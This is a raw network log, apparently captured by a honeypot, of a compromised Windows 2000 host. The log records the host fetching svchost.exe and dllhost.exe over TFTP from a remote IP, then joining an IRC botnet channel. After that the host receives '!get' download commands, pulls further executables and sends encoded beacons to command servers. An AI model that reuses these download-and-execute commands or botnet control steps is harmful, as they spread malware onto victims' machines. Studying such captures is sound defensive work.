VICTIM: Microsoft Windows 2000 [Version 5.00.2195]
VICTIM: (C) Copyright 1985-2000 Microsoft Corp.C:\\WINNT\\system32>
VICTIM: dir wins\\dllhost.exe
VICTIM: Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\winsFile Not FoundC:\\WINNT\\system32>
VICTIM: dir dllcache\\tftpd.exe
VICTIM: Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\dllcacheFile Not FoundC:\\WINNT\\system32>
VICTIM: tftp -i 70.165.19.238 get svchost.exe wins\\SVCHOST.EXE
VICTIM: \000\001svchost.exe\000octet\000
VICTIM: \000\004\000\001
VICTIM: \000\004\000\002
VICTIM: \000\004\000\003
VICTIM: \000\004\000\004
VICTIM: \000\004\000\005
VICTIM: \000\004\000\006
VICTIM: \000\004\000\007
VICTIM: \000\004\000\010
VICTIM: \000\004\000\t
VICTIM: \000\004\000
VICTIM: \000\004\000\013
VICTIM: \000\004\000\014
VICTIM: \000\004\000
VICTIM: \000\004\000\016
VICTIM: \000\004\000\017
VICTIM: \000\004\000\020
VICTIM: \000\004\000\021
VICTIM: \000\004\000\022
VICTIM: \000\004\000\023
VICTIM: \000\004\000\024
VICTIM: \000\004\000\025
VICTIM: \000\004\000\026
VICTIM: \000\004\000\027
VICTIM: \000\004\000\030
VICTIM: \000\004\000\031
VICTIM: \000\004\000\032
VICTIM: \000\004\000\033
VICTIM: \000\004\000\034
VICTIM: \000\004\000\035
VICTIM: \000\004\000\036
VICTIM: \000\004\000\037
VICTIM: \000\004\000
VICTIM: \000\004\000!
VICTIM: \000\004\000\
VICTIM: \000\004\000#
VICTIM: \000\004\000\$
VICTIM: \000\004\000%
VICTIM: \000\004\000&
VICTIM: \000\004\000'
VICTIM: \000\004\000(
VICTIM: \000\004\000)
VICTIM: \000\004\000*
VICTIM: \000\004\000+
VICTIM: \000\004\000,
VICTIM: \000\004\000-
VICTIM: \000\004\000.
VICTIM: \000\004\000/
VICTIM: \000\004\0000
VICTIM: \000\004\0001
VICTIM: \000\004\0002
VICTIM: \000\004\0003
VICTIM: \000\004\0004
VICTIM: \000\004\0005
VICTIM: \000\004\0006
VICTIM: \000\004\0007
VICTIM: \000\004\0008
VICTIM: \000\004\0009
VICTIM: \000\004\000:
VICTIM: Transfer successful: 29456 bytes in 4 seconds, 7364 bytes/s
VICTIM: C:\\WINNT\\system32>
VICTIM: \000\001dllhost.exe\000octet\000
VICTIM: tftp -i 70.165.19.238 get dllhost.exe wins\\DLLHOST.EXE
VICTIM: \000\001dllhost.exe\000octet\000
VICTIM: \000\001dllhost.exe\000octet\000
VICTIM: \000\004\000\001
VICTIM: \000\005\000\005unexpected port number\000
VICTIM: \000\005\000\005unexpected port number\000
VICTIM: \000\005\000\005unexpected port number\000
VICTIM: \000\005\000\005unexpected port number\000
VICTIM: \000\004\000\001
VICTIM: \000\004\000\001
VICTIM: \000\005\000\005unexpected port number\000
VICTIM: \000\004\000\002
VICTIM: \000\004\000\003
VICTIM: \000\004\000\004
VICTIM: \000\004\000\005
VICTIM: \000\004\000\006
VICTIM: \000\004\000\007
VICTIM: \000\004\000\010
VICTIM: \000\004\000\t
VICTIM: \000\004\000
VICTIM: \000\004\000\013
VICTIM: \000\004\000\014
VICTIM: \000\004\000
VICTIM: \000\004\000\016
VICTIM: \000\004\000\017
VICTIM: \000\004\000\020
VICTIM: \000\005\000\005unexpected port number\000
VICTIM: \000\004\000\021
VICTIM: \000\004\000\022
VICTIM: \000\004\000\023
VICTIM: \000\004\000\024
VICTIM: \000\004\000\025
VICTIM: \000\004\000\026
VICTIM: \000\004\000\027
VICTIM: \000\004\000\030
VICTIM: \000\004\000\031
VICTIM: \000\004\000\032
VICTIM: \000\004\000\033
VICTIM: \000\004\000\034
VICTIM: \000\004\000\035
VICTIM: \000\004\000\036
VICTIM: \000\004\000\037
VICTIM: \000\004\000
VICTIM: \000\004\000!
VICTIM: \000\004\000\
VICTIM: \000\004\000#
VICTIM: \000\004\000\$
VICTIM: \000\004\000%
VICTIM: \000\004\000&
VICTIM: \000\004\000'
VICTIM: \000\004\000(
VICTIM: Transfer successful: 19968 bytes in 6 seconds, 3328 bytes/s
VICTIM: C:\\WINNT\\system32>
VICTIM: wins\\DLLHOST.EXE
VICTIM: NICK wmrjkmsdUSER f020500 . . :-
VICTIM: Service Pack 2JOIN &virtu
ATTACKER: :u. PRIVMSG wmrjkmsd :!get http:/shabi.coolnuff.com:2012/p/out/kp.exe:u. PRIVMSG wmrjkmsd :!get http:/mymelanet.com/ml2.txt
VICTIM: GET /ml2.txt HTTP/1.0User-Agent: DownloadHost: mymelanet.comPragma: no-cache
ATTACKER: GET /list.php?c=B4AC885F94224AE64DAAC6EE0346C213D049B58E0B2969FEDCEBCA8B5FF8F6CEDFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5F44337&v=2&t=0.9667627 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: mewgost.comConnection: Keep-AlivePragma: no-cache
ATTACKER: GET /tm/3387x.exe?t=0.8599512 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: mymelanet.comConnection: Keep-AlivePragma: no-cache
ATTACKER: GET /sn.php?c=9F81896D0E9E2A8886764E178CFA7F8B529BC7FED0F1EF7594AC8EC814C395B387CD415792FD99AA4779E292505DB1AD3DCB7E983E9CE8CCDEEC0D797E019EF495DA9A3D03CCD14EFDC7A4DE5DB39A4554A3C3FED3ADFBFD2C8E8EE3B35BD7A36432BDB7E6FD42EE57E48B0CC7C7FB6153A45E71357237104D14AAC5E751A11FD3DA13B0002E9E564173D282E427D555&t=6.087893E-02 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: mewgost.comConnection: Keep-AlivePragma: no-cache
ATTACKER: GET /sn.php?c=2D337F9BEA7A77D59464673E20564BBFF63FE3DAFEDFF963576FBDFBB96E2F09BEF4AFB9AEC1281B89B76E1E5459D0CC03F5E70170D2290D390BC9BD88F7ED87094643E4995674EB7B410F750CE2D90654A3AF92E799585EE94BF79A41A9FB8F3264CBC1F8E376DA1FAC2ABCA65F4FC72FDA6B35D08342703E2AC7B261C3E3199E8E18BF576385446A59E0B1BD7D5BD917F7&t=0.901333 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: mewgost.comConnection: Keep-AlivePragma: no-cache
ATTACKER: PING :k.
ATTACKER: PONG :k.
VICTIM: JOIN &virtu
ATTACKER: GET /bl/wus.exe?t=0.8853418 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: wertlist.comConnection: Keep-AlivePragma: no-cache
ATTACKER: GET /sn.php?c=011FC420F36373D4839993BAD39F33F362F8D8E099D759C3C4FC763FB4186C37A4EECB2318225A71C8FED54AD9D7BC52F339997FF8945C745C3DC5627C04F486603194E0C5C039A6744EF2881EF018C75DAAE0DD91EF4046A3011B76FF17E0944315F8F26F74B21EA4179314A7A738A2CC3B2807F9BE4562D48DC1AE60D6C07E999512BACCF9A563B58CA1F9B97A4CC8&t=0.8182032 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: mewgost.comConnection: Keep-AlivePragma: no-cache
ATTACKER: GET /sn.php?c=A8B62ECA5FCFF255766C2108AFE3C606F16B0C3416585CC60931743D11BD114A3C762AC2417BD0FB52642AB5BDB321CF4A80C325ADC1634B94F5F85F156D552781D02652EEEBDC43F7CDE8927B9500DF699E3805DAA4373106A4D7BAD931E6923167EEE40C1725893281F5631CE5C24A2BDED48A623189BB4D59483DB517C3394B5B892F80B1FD420F382A7E17D50B76AC77&t=0.6099512 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: mewgost.comConnection: Keep-AlivePragma: no-cache
ATTACKER: GET /tm/crty.exe?t=0.6363184 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: mymelanet.comConnection: Keep-AlivePragma: no-cache
ATTACKER: GET /sn.php?c=504E63879808A001C6360A53C9B3D81DFD3006613012CC00DDEF703115B3FCD3F68B677DA5982949157C58C62F20BAA615DE7C9493FC5F7DF8C9A2D6F68FF46F36672E56BB6CA837556F6218AF415E81BA4DDCE184FA5355BF1D600D816902760650D8D2776C45E90CBF991EF7F7BC2601F6E8C7C2857255D78EBDD28137BE009892C66EB78668AFFECBAFFBF3340D8E&t=0.6911585 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: mewgost.comConnection: Keep-AlivePragma: no-cache
ATTACKER: GET /sn.php?c=1A04B95D39A995341EEE18411B6133F6B17C5433C9EB3FF389BB1A5BCE686B44A0DD4B511825345489E0FD63F3FC0C1005CEC32B3857B795D2E32F5BC2BBF66DC39295ED22F563FC152F116B947A9C4301F6CBF6314FA3A58E2C7914668E85F1A9FF262CA4BF3A9677C432A459A0CD45EA1F9BC52073BC8E93877A0F3496A258B7A7D1782B0613D5A49C83D1E126C84B45A6&t=8.097476E-02 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: mewgost.comConnection: Keep-AlivePragma: no-cache
ATTACKER: PING :k.
ATTACKER: PONG :k.
VICTIM: JOIN &virtu
ATTACKER: PING :k.
ATTACKER: PONG :k.
VICTIM: JOIN &virtu
ATTACKER: PING :k.
ATTACKER: PONG :k.
VICTIM: JOIN &virtu
ATTACKER: PONG :k.
VICTIM: JOIN &virtu
ATTACKER: PONG :k.
VICTIM: JOIN &virtu
ATTACKER: PONG :k.
VICTIM: JOIN &virtu